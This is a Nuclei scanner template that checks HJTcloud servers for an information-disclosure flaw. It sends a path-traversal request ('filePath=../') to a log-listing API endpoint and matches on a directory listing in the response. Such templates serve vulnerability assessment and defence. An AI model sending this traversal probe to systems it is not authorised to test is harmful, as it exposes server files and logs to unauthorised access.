id: hjtcloud-information-disclosure

info:
  name: HJTcloud Information Disclosure
  author: pikpikcu
  severity: low
  reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
  tags: hjtcloud,exposure,config
  

requests:
  - method: GET
    path:
      - "{{BaseURL}}//him/api/rest/V1.0/system/log/list?filePath=../"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "/var/logs/../logs/"

      - type: status
        status:
          - 200
